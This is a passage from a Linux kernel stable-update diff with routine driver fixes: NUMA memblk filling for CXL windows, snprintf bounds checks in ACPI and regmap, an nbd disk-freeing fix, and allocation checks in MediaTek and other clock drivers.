++	struct numa_memblk **blk = &numa_memblk_list[0];
++	struct numa_meminfo *mi = &numa_meminfo;
++	int count = 0;
++	u64 prev_end;
++
++	/*
++	 * Create a list of pointers to numa_meminfo memblks that
++	 * overlap start, end. Exclude (start == bi->end) since
++	 * end addresses in both a CFMWS range and a memblk range
++	 * are exclusive.
++	 *
++	 * This list of pointers is used to make in-place changes
++	 * that fill out the numa_meminfo memblks.
++	 */
++	for (int i = 0; i < mi->nr_blks; i++) {
++		struct numa_memblk *bi = &mi->blk[i];
++
++		if (start < bi->end && end >= bi->start) {
++			blk[count] = &mi->blk[i];
++			count++;
++		}
++	}
++	if (!count)
++		return NUMA_NO_MEMBLK;
++
++	/* Sort the list of pointers in memblk->start order */
++	sort(&blk[0], count, sizeof(blk[0]), cmp_memblk, NULL);
++
++	/* Make sure the first/last memblks include start/end */
++	blk[0]->start = min(blk[0]->start, start);
++	blk[count - 1]->end = max(blk[count - 1]->end, end);
++
++	/*
++	 * Fill any gaps by tracking the previous memblks
++	 * end address and backfilling to it if needed.
++	 */
++	prev_end = blk[0]->end;
++	for (int i = 1; i < count; i++) {
++		struct numa_memblk *curr = blk[i];
++
++		if (prev_end >= curr->start) {
++			if (prev_end < curr->end)
++				prev_end = curr->end;
++		} else {
++			curr->start = prev_end;
++			prev_end = curr->end;
++		}
++	}
++	return 0;
++}
++
+ #endif
+diff --git a/block/blk-core.c b/block/blk-core.c
+index ebb7a1689b261..6eaf2b0ad7cca 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -490,8 +490,8 @@ static inline void bio_check_ro(struct bio *bio)
+ 	if (op_is_write(bio_op(bio)) && bdev_read_only(bio->bi_bdev)) {
+ 		if (op_is_flush(bio->bi_opf) && !bio_sectors(bio))
+ 			return;
+-		pr_warn("Trying to write to read-only block-device %pg\n",
+-			bio->bi_bdev);
++		pr_warn_ratelimited("Trying to write to read-only block-device %pg\n",
++				    bio->bi_bdev);
+ 		/* Older lvm-tools actually trigger this */
+ 	}
+ }
+diff --git a/drivers/acpi/device_sysfs.c b/drivers/acpi/device_sysfs.c
+index 120873dad2cc5..c727fb320eeea 100644
+--- a/drivers/acpi/device_sysfs.c
++++ b/drivers/acpi/device_sysfs.c
+@@ -158,8 +158,8 @@ static int create_pnp_modalias(struct acpi_device *acpi_dev, char *modalias,
+ 		return 0;
+ 
+ 	len = snprintf(modalias, size, "acpi:");
+-	if (len <= 0)
+-		return len;
++	if (len >= size)
++		return -ENOMEM;
+ 
+ 	size -= len;
+ 
+@@ -212,8 +212,10 @@ static int create_of_modalias(struct acpi_device *acpi_dev, char *modalias,
+ 	len = snprintf(modalias, size, "of:N%sT", (char *)buf.pointer);
+ 	ACPI_FREE(buf.pointer);
+ 
+-	if (len <= 0)
+-		return len;
++	if (len >= size)
++		return -ENOMEM;
++
++	size -= len;
+ 
+ 	of_compatible = acpi_dev->data.of_compatible;
+ 	if (of_compatible->type == ACPI_TYPE_PACKAGE) {
+diff --git a/drivers/acpi/numa/srat.c b/drivers/acpi/numa/srat.c
+index 1f4fc5f8a819d..12f330b0eac01 100644
+--- a/drivers/acpi/numa/srat.c
++++ b/drivers/acpi/numa/srat.c
+@@ -310,11 +310,16 @@ static int __init acpi_parse_cfmws(union acpi_subtable_headers *header,
+ 	start = cfmws->base_hpa;
+ 	end = cfmws->base_hpa + cfmws->window_size;
+ 
+-	/* Skip if the SRAT already described the NUMA details for this HPA */
+-	node = phys_to_target_node(start);
+-	if (node != NUMA_NO_NODE)
++	/*
++	 * The SRAT may have already described NUMA details for all,
++	 * or a portion of, this CFMWS HPA range. Extend the memblks
++	 * found for any portion of the window to cover the entire
++	 * window.
++	 */
++	if (!numa_fill_memblks(start, end))
+ 		return 0;
+ 
++	/* No SRAT description. Create a new node. */
+ 	node = acpi_map_pxm_to_node(*fake_pxm);
+ 
+ 	if (node == NUMA_NO_NODE) {
+diff --git a/drivers/acpi/property.c b/drivers/acpi/property.c
+index b8d9eb9a433ed..0565c18c2ee31 100644
+--- a/drivers/acpi/property.c
++++ b/drivers/acpi/property.c
+@@ -1114,25 +1114,26 @@ static int acpi_data_prop_read(const struct acpi_device_data *data,
+ 	switch (proptype) {
+ 	case DEV_PROP_STRING:
+ 		break;
+-	case DEV_PROP_U8 ... DEV_PROP_U64:
++	default:
+ 		if (obj->type == ACPI_TYPE_BUFFER) {
+ 			if (nval > obj->buffer.length)
+ 				return -EOVERFLOW;
+-			break;
++		} else {
++			if (nval > obj->package.count)
++				return -EOVERFLOW;
+ 		}
+-		fallthrough;
+-	default:
+-		if (nval > obj->package.count)
+-			return -EOVERFLOW;
+ 		break;
+ 	}
+ 	if (nval == 0)
+ 		return -EINVAL;
+ 
+-	if (obj->type != ACPI_TYPE_BUFFER)
+-		items = obj->package.elements;
+-	else
++	if (obj->type == ACPI_TYPE_BUFFER) {
++		if (proptype != DEV_PROP_U8)
++			return -EPROTO;
+ 		items = obj;
++	} else {
++		items = obj->package.elements;
++	}
+ 
+ 	switch (proptype) {
+ 	case DEV_PROP_U8:
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 073d26ddb6c21..60b0128a10e86 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -130,6 +130,16 @@ static int video_detect_force_native(const struct dmi_system_id *d)
+ 	return 0;
+ }
+ 
++static int video_detect_portege_r100(const struct dmi_system_id *d)
++{
++	struct pci_dev *dev;
++	/* Search for Trident CyberBlade XP4m32 to confirm Portégé R100 */
++	dev = pci_get_device(PCI_VENDOR_ID_TRIDENT, 0x2100, NULL);
++	if (dev)
++		acpi_backlight_dmi = acpi_backlight_vendor;
++	return 0;
++}
++
+ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	/*
+ 	 * Models which should use the vendor backlight interface,
+@@ -268,6 +278,22 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
++	/*
++	 * Toshiba Portégé R100 has working both acpi_video and toshiba_acpi
++	 * vendor driver. But none of them gets activated as it has a VGA with
++	 * no kernel driver (Trident CyberBlade XP4m32).
++	 * The DMI strings are generic so check for the VGA chip in callback.
++	 */
++	{
++	 .callback = video_detect_portege_r100,
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Portable PC"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "Version 1.0"),
++		DMI_MATCH(DMI_BOARD_NAME, "Portable PC")
++		},
++	},
++
+ 	/*
+ 	 * Models which need acpi_video backlight control where the GPU drivers
+ 	 * do not call acpi_video_register_backlight() because no internal panel
+diff --git a/drivers/base/regmap/regmap-debugfs.c b/drivers/base/regmap/regmap-debugfs.c
+index 817eda2075aa5..1e3d205ce15a0 100644
+--- a/drivers/base/regmap/regmap-debugfs.c
++++ b/drivers/base/regmap/regmap-debugfs.c
+@@ -48,7 +48,7 @@ static ssize_t regmap_name_read_file(struct file *file,
+ 		name = map->dev->driver->name;
+ 
+ 	ret = snprintf(buf, PAGE_SIZE, "%s\n", name);
+-	if (ret < 0) {
++	if (ret >= PAGE_SIZE) {
+ 		kfree(buf);
+ 		return ret;
+ 	}
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index df1f78abdf266..140af27f591ae 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -1702,17 +1702,19 @@ static int _regmap_raw_write_impl(struct regmap *map, unsigned int reg,
+ 	}
+ 
+ 	if (!map->cache_bypass && map->format.parse_val) {
+-		unsigned int ival;
++		unsigned int ival, offset;
+ 		int val_bytes = map->format.val_bytes;
+-		for (i = 0; i < val_len / val_bytes; i++) {
+-			ival = map->format.parse_val(val + (i * val_bytes));
+-			ret = regcache_write(map,
+-					     reg + regmap_get_offset(map, i),
+-					     ival);
++
++		/* Cache the last written value for noinc writes */
++		i = noinc ? val_len - val_bytes : 0;
++		for (; i < val_len; i += val_bytes) {
++			ival = map->format.parse_val(val + i);
++			offset = noinc ? 0 : regmap_get_offset(map, i / val_bytes);
++			ret = regcache_write(map, reg + offset, ival);
+ 			if (ret) {
+ 				dev_err(map->dev,
+ 					"Error in caching of register: %x ret: %d\n",
+-					reg + regmap_get_offset(map, i), ret);
++					reg + offset, ret);
+ 				return ret;
+ 			}
+ 		}
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 7718c81e1dba8..e94d2ff6b1223 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -250,7 +250,6 @@ static void nbd_dev_remove(struct nbd_device *nbd)
+ 	struct gendisk *disk = nbd->disk;
+ 
+ 	del_gendisk(disk);
+-	put_disk(disk);
+ 	blk_mq_free_tag_set(&nbd->tag_set);
+ 
+ 	/*
+@@ -261,7 +260,7 @@ static void nbd_dev_remove(struct nbd_device *nbd)
+ 	idr_remove(&nbd_index_idr, nbd->index);
+ 	mutex_unlock(&nbd_index_mutex);
+ 	destroy_workqueue(nbd->recv_workq);
+-	kfree(nbd);
++	put_disk(disk);
+ }
+ 
+ static void nbd_dev_remove_work(struct work_struct *work)
+@@ -1608,6 +1607,13 @@ static void nbd_release(struct gendisk *disk, fmode_t mode)
+ 	nbd_put(nbd);
+ }
+ 
++static void nbd_free_disk(struct gendisk *disk)
++{
++	struct nbd_device *nbd = disk->private_data;
++
++	kfree(nbd);
++}
++
+ static const struct block_device_operations nbd_fops =
+ {
+ 	.owner =	THIS_MODULE,
+@@ -1615,6 +1621,7 @@ static const struct block_device_operations nbd_fops =
+ 	.release =	nbd_release,
+ 	.ioctl =	nbd_ioctl,
+ 	.compat_ioctl =	nbd_ioctl,
++	.free_disk =	nbd_free_disk,
+ };
+ 
+ #if IS_ENABLED(CONFIG_DEBUG_FS)
+diff --git a/drivers/char/hw_random/bcm2835-rng.c b/drivers/char/hw_random/bcm2835-rng.c
+index e98fcac578d66..634eab4776f32 100644
+--- a/drivers/char/hw_random/bcm2835-rng.c
++++ b/drivers/char/hw_random/bcm2835-rng.c
+@@ -71,7 +71,7 @@ static int bcm2835_rng_read(struct hwrng *rng, void *buf, size_t max,
+ 	while ((rng_readl(priv, RNG_STATUS) >> 24) == 0) {
+ 		if (!wait)
+ 			return 0;
+-		hwrng_msleep(rng, 1000);
++		hwrng_yield(rng);
+ 	}
+ 
+ 	num_words = rng_readl(priv, RNG_STATUS) >> 24;
+diff --git a/drivers/char/hw_random/core.c b/drivers/char/hw_random/core.c
+index cc002b0c2f0c3..8f31f9d810305 100644
+--- a/drivers/char/hw_random/core.c
++++ b/drivers/char/hw_random/core.c
+@@ -680,6 +680,12 @@ long hwrng_msleep(struct hwrng *rng, unsigned int msecs)
+ }
+ EXPORT_SYMBOL_GPL(hwrng_msleep);
+ 
++long hwrng_yield(struct hwrng *rng)
++{
++	return wait_for_completion_interruptible_timeout(&rng->dying, 1);
++}
++EXPORT_SYMBOL_GPL(hwrng_yield);
++
+ static int __init hwrng_modinit(void)
+ {
+ 	int ret;
+diff --git a/drivers/char/hw_random/geode-rng.c b/drivers/char/hw_random/geode-rng.c
+index 12fbe80918319..159baf00a8675 100644
+--- a/drivers/char/hw_random/geode-rng.c
++++ b/drivers/char/hw_random/geode-rng.c
+@@ -58,7 +58,8 @@ struct amd_geode_priv {
+ 
+ static int geode_rng_data_read(struct hwrng *rng, u32 *data)
+ {
+-	void __iomem *mem = (void __iomem *)rng->priv;
++	struct amd_geode_priv *priv = (struct amd_geode_priv *)rng->priv;
++	void __iomem *mem = priv->membase;
+ 
+ 	*data = readl(mem + GEODE_RNG_DATA_REG);
+ 
+@@ -67,7 +68,8 @@ static int geode_rng_data_read(struct hwrng *rng, u32 *data)
+ 
+ static int geode_rng_data_present(struct hwrng *rng, int wait)
+ {
+-	void __iomem *mem = (void __iomem *)rng->priv;
++	struct amd_geode_priv *priv = (struct amd_geode_priv *)rng->priv;
++	void __iomem *mem = priv->membase;
+ 	int data, i;
+ 
+ 	for (i = 0; i < 20; i++) {
+diff --git a/drivers/clk/clk-npcm7xx.c b/drivers/clk/clk-npcm7xx.c
+index e319cfa51a8a3..030186def9c69 100644
+--- a/drivers/clk/clk-npcm7xx.c
++++ b/drivers/clk/clk-npcm7xx.c
+@@ -510,7 +510,7 @@ static void __init npcm7xx_clk_init(struct device_node *clk_np)
+ 	return;
+ 
+ npcm7xx_init_fail:
+-	kfree(npcm7xx_clk_data->hws);
++	kfree(npcm7xx_clk_data);
+ npcm7xx_init_np_err:
+ 	iounmap(clk_base);
+ npcm7xx_init_error:
+diff --git a/drivers/clk/clk-scmi.c b/drivers/clk/clk-scmi.c
+index 2c7a830ce3080..fdec715c9ba9b 100644
+--- a/drivers/clk/clk-scmi.c
++++ b/drivers/clk/clk-scmi.c
+@@ -213,6 +213,7 @@ static int scmi_clocks_probe(struct scmi_device *sdev)
+ 		sclk->info = scmi_proto_clk_ops->info_get(ph, idx);
+ 		if (!sclk->info) {
+ 			dev_dbg(dev, "invalid clock info for idx %d\n", idx);
++			devm_kfree(dev, sclk);
+ 			continue;
+ 		}
+ 
+diff --git a/drivers/clk/imx/Kconfig b/drivers/clk/imx/Kconfig
+index 25785ec9c2762..f219004b8a337 100644
+--- a/drivers/clk/imx/Kconfig
++++ b/drivers/clk/imx/Kconfig
+@@ -96,6 +96,7 @@ config CLK_IMX8QXP
+ 	depends on (ARCH_MXC && ARM64) || COMPILE_TEST
+ 	depends on IMX_SCU && HAVE_ARM_SMCCC
+ 	select MXC_CLK_SCU
++	select MXC_CLK
+ 	help
+ 	  Build the driver for IMX8QXP SCU based clocks.
+ 
+diff --git a/drivers/clk/imx/clk-imx8mq.c b/drivers/clk/imx/clk-imx8mq.c
+index 882dcad4817d7..0a75814b3bc77 100644
+--- a/drivers/clk/imx/clk-imx8mq.c
++++ b/drivers/clk/imx/clk-imx8mq.c
+@@ -288,8 +288,7 @@ static int imx8mq_clocks_probe(struct platform_device *pdev)
+ 	void __iomem *base;
+ 	int err;
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
+-					  IMX8MQ_CLK_END), GFP_KERNEL);
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws, IMX8MQ_CLK_END), GFP_KERNEL);
+ 	if (WARN_ON(!clk_hw_data))
+ 		return -ENOMEM;
+ 
+@@ -306,10 +305,12 @@ static int imx8mq_clocks_probe(struct platform_device *pdev)
+ 	hws[IMX8MQ_CLK_EXT4] = imx_obtain_fixed_clk_hw(np, "clk_ext4");
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx8mq-anatop");
+-	base = of_iomap(np, 0);
++	base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+-	if (WARN_ON(!base))
+-		return -ENOMEM;
++	if (WARN_ON(IS_ERR(base))) {
++		err = PTR_ERR(base);
++		goto unregister_hws;
++	}
+ 
+ 	hws[IMX8MQ_ARM_PLL_REF_SEL] = imx_clk_hw_mux("arm_pll_ref_sel", base + 0x28, 16, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MQ_GPU_PLL_REF_SEL] = imx_clk_hw_mux("gpu_pll_ref_sel", base + 0x18, 16, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+@@ -395,8 +396,10 @@ static int imx8mq_clocks_probe(struct platform_device *pdev)
+ 
+ 	np = dev->of_node;
+ 	base = devm_platform_ioremap_resource(pdev, 0);
+-	if (WARN_ON(IS_ERR(base)))
+-		return PTR_ERR(base);
++	if (WARN_ON(IS_ERR(base))) {
++		err = PTR_ERR(base);
++		goto unregister_hws;
++	}
+ 
+ 	/* CORE */
+ 	hws[IMX8MQ_CLK_A53_DIV] = imx8m_clk_hw_composite_core("arm_a53_div", imx8mq_a53_sels, base + 0x8000);
+diff --git a/drivers/clk/imx/clk-imx8qxp.c b/drivers/clk/imx/clk-imx8qxp.c
+index 546a3703bfeb2..273de1f293076 100644
+--- a/drivers/clk/imx/clk-imx8qxp.c
++++ b/drivers/clk/imx/clk-imx8qxp.c
+@@ -148,10 +148,10 @@ static int imx8qxp_clk_probe(struct platform_device *pdev)
+ 	imx_clk_scu("adc0_clk",  IMX_SC_R_ADC_0, IMX_SC_PM_CLK_PER);
+ 	imx_clk_scu("adc1_clk",  IMX_SC_R_ADC_1, IMX_SC_PM_CLK_PER);
+ 	imx_clk_scu("pwm_clk",   IMX_SC_R_LCD_0_PWM_0, IMX_SC_PM_CLK_PER);
++	imx_clk_scu("elcdif_pll", IMX_SC_R_ELCDIF_PLL, IMX_SC_PM_CLK_PLL);
+ 	imx_clk_scu2("lcd_clk", lcd_sels, ARRAY_SIZE(lcd_sels), IMX_SC_R_LCD_0, IMX_SC_PM_CLK_PER);
+ 	imx_clk_scu2("lcd_pxl_clk", lcd_pxl_sels, ARRAY_SIZE(lcd_pxl_sels), IMX_SC_R_LCD_0, IMX_SC_PM_CLK_MISC0);
+ 	imx_clk_scu("lcd_pxl_bypass_div_clk", IMX_SC_R_LCD_0, IMX_SC_PM_CLK_BYPASS);
+-	imx_clk_scu("elcdif_pll", IMX_SC_R_ELCDIF_PLL, IMX_SC_PM_CLK_PLL);
+ 
+ 	/* Audio SS */
+ 	imx_clk_scu("audio_pll0_clk", IMX_SC_R_AUDIO_PLL_0, IMX_SC_PM_CLK_PLL);
+diff --git a/drivers/clk/keystone/pll.c b/drivers/clk/keystone/pll.c
+index ee5c72369334f..6bbdd4705d71f 100644
+--- a/drivers/clk/keystone/pll.c
++++ b/drivers/clk/keystone/pll.c
+@@ -281,12 +281,13 @@ static void __init of_pll_div_clk_init(struct device_node *node)
+ 
+ 	clk = clk_register_divider(NULL, clk_name, parent_name, 0, reg, shift,
+ 				 mask, 0, NULL);
+-	if (clk) {
+-		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+-	} else {
++	if (IS_ERR(clk)) {
+ 		pr_err("%s: error registering divider %s\n", __func__, clk_name);
+ 		iounmap(reg);
++		return;
+ 	}
++
++	of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ }
+ CLK_OF_DECLARE(pll_divider_clock, "ti,keystone,pll-divider-clock", of_pll_div_clk_init);
+ 
+@@ -328,10 +329,12 @@ static void __init of_pll_mux_clk_init(struct device_node *node)
+ 	clk = clk_register_mux(NULL, clk_name, (const char **)&parents,
+ 				ARRAY_SIZE(parents) , 0, reg, shift, mask,
+ 				0, NULL);
+-	if (clk)
+-		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+-	else
++	if (IS_ERR(clk)) {
+ 		pr_err("%s: error registering mux %s\n", __func__, clk_name);
++		return;
++	}
++
++	of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ }
+ CLK_OF_DECLARE(pll_mux_clock, "ti,keystone,pll-mux-clock", of_pll_mux_clk_init);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt2701.c b/drivers/clk/mediatek/clk-mt2701.c
+index 1c3a93143dc5e..00d2e81bdd43e 100644
+--- a/drivers/clk/mediatek/clk-mt2701.c
++++ b/drivers/clk/mediatek/clk-mt2701.c
+@@ -670,6 +670,8 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 								clk_data);
+@@ -749,6 +751,8 @@ static void __init mtk_infrasys_init_early(struct device_node *node)
+ 
+ 	if (!infra_clk_data) {
+ 		infra_clk_data = mtk_alloc_clk_data(CLK_INFRA_NR);
++		if (!infra_clk_data)
++			return;
+ 
+ 		for (i = 0; i < CLK_INFRA_NR; i++)
+ 			infra_clk_data->hws[i] = ERR_PTR(-EPROBE_DEFER);
+@@ -776,6 +780,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 
+ 	if (!infra_clk_data) {
+ 		infra_clk_data = mtk_alloc_clk_data(CLK_INFRA_NR);
++		if (!infra_clk_data)
++			return -ENOMEM;
+ 	} else {
+ 		for (i = 0; i < CLK_INFRA_NR; i++) {
+ 			if (infra_clk_data->hws[i] == ERR_PTR(-EPROBE_DEFER))
+@@ -893,6 +899,8 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+ 						clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt6765.c b/drivers/clk/mediatek/clk-mt6765.c
+index 665981fc411f5..2c6a52ff5564e 100644
+--- a/drivers/clk/mediatek/clk-mt6765.c
++++ b/drivers/clk/mediatek/clk-mt6765.c
+@@ -738,6 +738,8 @@ static int clk_mt6765_apmixed_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_APMIXED_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+@@ -773,6 +775,8 @@ static int clk_mt6765_top_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_fixed_clks(fixed_clks, ARRAY_SIZE(fixed_clks),
+ 				    clk_data);
+@@ -813,6 +817,8 @@ static int clk_mt6765_ifr_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IFR_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, ifr_clks, ARRAY_SIZE(ifr_clks),
+ 			       clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt6779.c b/drivers/clk/mediatek/clk-mt6779.c
+index 0d0a90ee5eb2c..39dadc9547088 100644
+--- a/drivers/clk/mediatek/clk-mt6779.c
++++ b/drivers/clk/mediatek/clk-mt6779.c
+@@ -1218,6 +1218,8 @@ static int clk_mt6779_apmixed_probe(struct platform_device *pdev)
+ 	struct device_node *node = pdev->dev.of_node;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_APMIXED_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+@@ -1238,6 +1240,8 @@ static int clk_mt6779_top_probe(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 				    clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt6797.c b/drivers/clk/mediatek/clk-mt6797.c
+index 78339cb35beb0..b362e99c8f53c 100644
+--- a/drivers/clk/mediatek/clk-mt6797.c
++++ b/drivers/clk/mediatek/clk-mt6797.c
+@@ -392,6 +392,8 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_factors(top_fixed_divs, ARRAY_SIZE(top_fixed_divs),
+ 				 clk_data);
+@@ -546,6 +548,8 @@ static void mtk_infrasys_init_early(struct device_node *node)
+ 
+ 	if (!infra_clk_data) {
+ 		infra_clk_data = mtk_alloc_clk_data(CLK_INFRA_NR);
++		if (!infra_clk_data)
++			return;
+ 
+ 		for (i = 0; i < CLK_INFRA_NR; i++)
+ 			infra_clk_data->hws[i] = ERR_PTR(-EPROBE_DEFER);
+@@ -571,6 +575,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 
+ 	if (!infra_clk_data) {
+ 		infra_clk_data = mtk_alloc_clk_data(CLK_INFRA_NR);
++		if (!infra_clk_data)
++			return -ENOMEM;
+ 	} else {
+ 		for (i = 0; i < CLK_INFRA_NR; i++) {
+ 			if (infra_clk_data->hws[i] == ERR_PTR(-EPROBE_DEFER))
+diff --git a/drivers/clk/mediatek/clk-mt7629-eth.c b/drivers/clk/mediatek/clk-mt7629-eth.c
+index b0c8fa3b8bbec..e1d2635c72c10 100644
+--- a/drivers/clk/mediatek/clk-mt7629-eth.c
++++ b/drivers/clk/mediatek/clk-mt7629-eth.c
+@@ -79,6 +79,8 @@ static int clk_mt7629_ethsys_init(struct platform_device *pdev)
+ 	int r;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_ETH_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, eth_clks, CLK_ETH_NR_CLK, clk_data);
+ 
+@@ -101,6 +103,8 @@ static int clk_mt7629_sgmiisys_init(struct platform_device *pdev)
+ 	int r;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_SGMII_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, sgmii_clks[id++], CLK_SGMII_NR_CLK,
+ 			       clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt7629.c b/drivers/clk/mediatek/clk-mt7629.c
+index 0bc88b7d171b5..01ee45fcd7e34 100644
+--- a/drivers/clk/mediatek/clk-mt7629.c
++++ b/drivers/clk/mediatek/clk-mt7629.c
+@@ -557,6 +557,8 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 				    clk_data);
+@@ -580,6 +582,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 	struct clk_hw_onecell_data *clk_data;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+ 			       clk_data);
+@@ -603,6 +607,8 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+ 			       clk_data);
+diff --git a/drivers/clk/qcom/Kconfig b/drivers/clk/qcom/Kconfig
+index 76e6dee450d59..cbf55949c6493 100644
+--- a/drivers/clk/qcom/Kconfig
++++ b/drivers/clk/qcom/Kconfig
+@@ -127,6 +127,7 @@ config IPQ_APSS_6018
+ 	tristate "IPQ APSS Clock Controller"
+ 	select IPQ_APSS_PLL
+ 	depends on QCOM_APCS_IPC || COMPILE_TEST
++	depends on QCOM_SMEM
+ 	help
+ 	  Support for APSS clock controller on IPQ platforms. The
+ 	  APSS clock controller manages the Mux and enable block that feeds the
+diff --git a/drivers/clk/qcom/clk-rcg2.c b/drivers/clk/qcom/clk-rcg2.c
+index 76551534f10df..dc797bd137caf 100644
+--- a/drivers/clk/qcom/clk-rcg2.c
++++ b/drivers/clk/qcom/clk-rcg2.c
+@@ -158,17 +158,11 @@ static int clk_rcg2_set_parent(struct clk_hw *hw, u8 index)
+ static unsigned long
+ calc_rate(unsigned long rate, u32 m, u32 n, u32 mode, u32 hid_div)
+ {
+-	if (hid_div) {
+-		rate *= 2;
+-		rate /= hid_div + 1;
+-	}
++	if (hid_div)
++		rate = mult_frac(rate, 2, hid_div + 1);
+ 
+-	if (mode) {
+-		u64 tmp = rate;
+-		tmp *= m;
+-		do_div(tmp, n);
+-		rate = tmp;
+-	}
++	if (mode)
++		rate = mult_frac(rate, m, n);
+ 
+ 	return rate;
+ }
+diff --git a/drivers/clk/qcom/gcc-msm8996.c b/drivers/clk/qcom/gcc-msm8996.c
+index e161637067351..ff5a16700ef71 100644
+--- a/drivers/clk/qcom/gcc-msm8996.c
++++ b/drivers/clk/qcom/gcc-msm8996.c
+@@ -245,71 +245,6 @@ static const struct clk_parent_data gcc_xo_gpll0_gpll4_gpll0_early_div[] = {
+ 	{ .hw = &gpll0_early_div.hw }
+ };
+ 
+-static const struct freq_tbl ftbl_system_noc_clk_src[] = {
+-	F(19200000, P_XO, 1, 0, 0),
+-	F(50000000, P_GPLL0_EARLY_DIV, 6, 0, 0),
+-	F(100000000, P_GPLL0, 6, 0, 0),
+-	F(150000000, P_GPLL0, 4, 0, 0),
+-	F(200000000, P_GPLL0, 3, 0, 0),
+-	F(240000000, P_GPLL0, 2.5, 0, 0),
+-	{ }
+-};
+-
+-static struct clk_rcg2 system_noc_clk_src = {
+-	.cmd_rcgr = 0x0401c,
+-	.hid_width = 5,
+-	.parent_map = gcc_xo_gpll0_gpll0_early_div_map,
+-	.freq_tbl = ftbl_system_noc_clk_src,
+-	.clkr.hw.init = &(struct clk_init_data){
+-		.name = "system_noc_clk_src",
+-		.parent_data = gcc_xo_gpll0_gpll0_early_div,
+-		.num_parents = ARRAY_SIZE(gcc_xo_gpll0_gpll0_early_div),
+-		.ops = &clk_rcg2_ops,
+-	},
+-};
+-
+-static const struct freq_tbl ftbl_config_noc_clk_src[] = {
+-	F(19200000, P_XO, 1, 0, 0),
+-	F(37500000, P_GPLL0, 16, 0, 0),
+-	F(75000000, P_GPLL0, 8, 0, 0),
